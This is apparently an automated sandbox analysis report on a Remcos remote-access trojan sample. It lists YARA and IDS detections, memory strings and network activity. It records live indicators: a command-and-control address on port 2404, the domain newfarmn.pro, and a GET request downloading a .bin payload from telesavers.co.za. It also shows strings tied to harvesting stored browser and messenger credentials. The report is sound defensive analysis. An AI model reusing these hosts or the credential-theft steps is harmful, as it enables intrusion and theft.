Source: Yara match; File source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 131_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 131_2_00404423
Source: asXlZG3aW6.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 102.65.21.26:443 -> 192.168.11.20:49735 version: TLS 1.2
Source: asXlZG3aW6.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 0_2_00406268 FindFirstFileA,FindClose, 0_2_00406268
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040572D
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 0_2_004026F8 FindFirstFileA, 0_2_004026F8
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 130_2_00406268 FindFirstFileA,FindClose, 130_2_00406268
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 130_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 130_2_0040572D
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 130_2_004026F8 LdrInitializeThunk,FindFirstFileA, 130_2_004026F8
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 130_2_367B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 130_2_367B10F1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 130_2_367B6580 FindFirstFileExA, 130_2_367B6580
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 131_2_0040AE51 FindFirstFileW,FindNextFileW, 131_2_0040AE51
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 132_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 132_2_00407EF8
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; Code function: 133_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 133_2_00407898
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; File opened: C:\Users\user
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\asXlZG3aW6.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache

              Networking

              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49739 -> 41.216.188.178:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49736 -> 41.216.188.178:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49738 -> 41.216.188.178:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49737 -> 41.216.188.178:2404
              Source: Malware configuration extractorURLs: newfarmn.pro
              Source: global trafficTCP traffic: 192.168.11.20:49736 -> 41.216.188.178:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49740 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49735 -> 102.65.21.26:443
              Source: global trafficHTTP traffic detected: GET /EsbmqCxkb162.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: telesavers.co.zaCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /EsbmqCxkb162.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: telesavers.co.zaCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: asXlZG3aW6.exe, 00000083.00000003.21822346966.0000000002278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainText
URLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
              Source: asXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: asXlZG3aW6.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: asXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.facebook.com (Facebook)
              Source: asXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.yahoo.com (Yahoo)
              Source: asXlZG3aW6.exe, 00000083.00000003.21822914001.0000000002A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposeP
refixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prom
              Source: asXlZG3aW6.exe, 00000082.00000002.26279946658.0000000035E20000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: asXlZG3aW6.exe, 00000082.00000002.26279946658.0000000035E20000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: telesavers.co.za
              Source: global trafficDNS traffic detected: DNS query: newfarmn.pro
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://c.pki.goog/r/r1.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://c.pki.goog/wr2/9UVbN0w5E6Y.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
              Source: asXlZG3aW6.exe, 00000082.00000002.26269410361.000000000522B000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21776966540.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
              Source: asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gptn
              Source: asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
              Source: asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpx
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://i.pki.goog/r1.crt0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://i.pki.goog/wr2.crt0
              Source: asXlZG3aW6.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: asXlZG3aW6.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://o.pki.goog/wr20%
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
              Source: bhv2AA3.tmp.131.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000003.21796946361.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000003.21796891170.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: asXlZG3aW6.exe, 00000085.00000002.21797163684.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
              Source: asXlZG3aW6.exe, 00000085.00000003.21796946361.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000003.21796891170.000000000049D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: asXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: asXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: asXlZG3aW6.exe, 00000083.00000002.21826845805.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
Source: asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
